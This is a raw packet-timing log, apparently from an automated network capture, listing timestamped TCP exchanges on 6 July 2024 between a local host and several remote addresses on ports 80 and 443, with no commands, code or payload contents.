                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772777081 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772788048 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772799015 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772809029 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772833109 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.772958040 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773736000 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773787975 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773797989 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773818970 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773842096 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773904085 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773914099 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773925066 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773937941 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773947954 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.773972988 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774235964 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774255037 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774267912 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774277925 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774288893 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774298906 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774308920 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774327040 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774346113 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774394989 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774405956 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774415970 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774426937 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774436951 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774446964 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774462938 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774468899 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774482012 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774492979 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774641037 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774652958 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774662971 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774681091 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774691105 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774703979 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774710894 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774722099 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.774739981 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775018930 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775054932 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775084019 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775094032 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775124073 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775204897 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775216103 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775224924 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775238037 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775245905 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775279045 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775311947 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775443077 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775454044 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775465012 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775475979 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775486946 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775496960 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775513887 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.775532961 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861267090 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861332893 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861387014 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861418962 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861494064 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861546993 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861567974 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861582994 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861599922 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861608028 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861624956 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861638069 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861646891 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861673117 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861686945 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861701012 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861709118 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861726999 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861736059 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861749887 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861769915 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861780882 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861790895 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861800909 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861808062 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861820936 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861829042 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861907005 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861917019 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861926079 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861948013 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.861965895 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862359047 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862400055 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862411022 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862433910 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862550020 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862560034 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862571001 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862581968 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862592936 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862607956 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862699986 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862719059 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862745047 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862802982 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862814903 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862824917 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862840891 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862847090 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.862867117 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863328934 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863368988 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863389015 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863404036 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863500118 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863511086 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863521099 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863533020 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863539934 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863567114 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863715887 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863727093 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863737106 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863749027 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863760948 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863771915 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863780022 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863794088 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.863837957 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864381075 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864392042 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864403009 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864425898 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864501953 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864511967 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864521980 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864532948 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864542007 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864558935 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864691973 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864701986 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864712000 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864723921 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864732981 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864744902 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864757061 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864778996 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.864845991 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865266085 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865284920 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865294933 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865325928 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865339994 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865411043 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865421057 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865431070 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865457058 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865570068 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865580082 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865591049 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865601063 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865611076 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865626097 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865741014 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865751982 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865761995 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865772963 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.865797043 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866281033 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866302013 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866313934 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866337061 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866417885 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866457939 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866481066 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866492987 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866503954 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866524935 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866596937 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866606951 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866617918 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866630077 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866638899 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866650105 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866683006 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866693974 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.866728067 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.867194891 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.867204905 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.867247105 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.867260933 CEST4976480192.168.2.4192.3.140.185
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.872251034 CEST8049764192.3.140.185192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.914648056 CEST44349765162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.916379929 CEST49765443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:25.916399956 CEST44349765162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.050488949 CEST4976680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.055460930 CEST8049766188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.055718899 CEST4976680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.055756092 CEST4976680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.060558081 CEST8049766188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.063711882 CEST4976680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.068625927 CEST8049766188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.241148949 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.241192102 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.241357088 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.785182953 CEST8049766188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.785711050 CEST8049766188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.785754919 CEST4976680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.788636923 CEST4976680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.861366034 CEST44349765162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.861442089 CEST44349765162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.861496925 CEST49765443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.861802101 CEST49765443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.876889944 CEST49768443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.876921892 CEST44349768162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.876995087 CEST49768443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.877337933 CEST49768443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.877347946 CEST44349768162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.893939972 CEST4976980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.898888111 CEST8049769188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.898942947 CEST4976980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.898973942 CEST4976980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.903827906 CEST8049769188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.903873920 CEST4976980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:26.908788919 CEST8049769188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.099267006 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.099292040 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.522389889 CEST44349768162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.530134916 CEST49768443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.530152082 CEST44349768162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.707406044 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.707498074 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.708857059 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.708863020 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.709069014 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.757757902 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.769922972 CEST8049769188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.770899057 CEST8049769188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.770948887 CEST4976980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.772838116 CEST4976980192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.804491043 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.878104925 CEST4977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.885690928 CEST8049770188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.885771036 CEST4977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.885797977 CEST4977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.890620947 CEST8049770188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.890707016 CEST4977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.895559072 CEST8049770188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.959079027 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.959141016 CEST44349767149.154.167.220192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:27.959196091 CEST49767443192.168.2.4149.154.167.220
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.101990938 CEST44349768162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.102061987 CEST44349768162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.102137089 CEST49768443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.102582932 CEST49768443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.148092985 CEST49771443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.148114920 CEST44349771162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.148186922 CEST49771443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.148464918 CEST49771443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.148478985 CEST44349771162.125.66.15192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.597379923 CEST8049770188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.599155903 CEST8049770188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.599205017 CEST4977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.600785017 CEST4977080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.706388950 CEST4977280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:28.711265087 CEST8049772188.114.96.3192.168.2.4
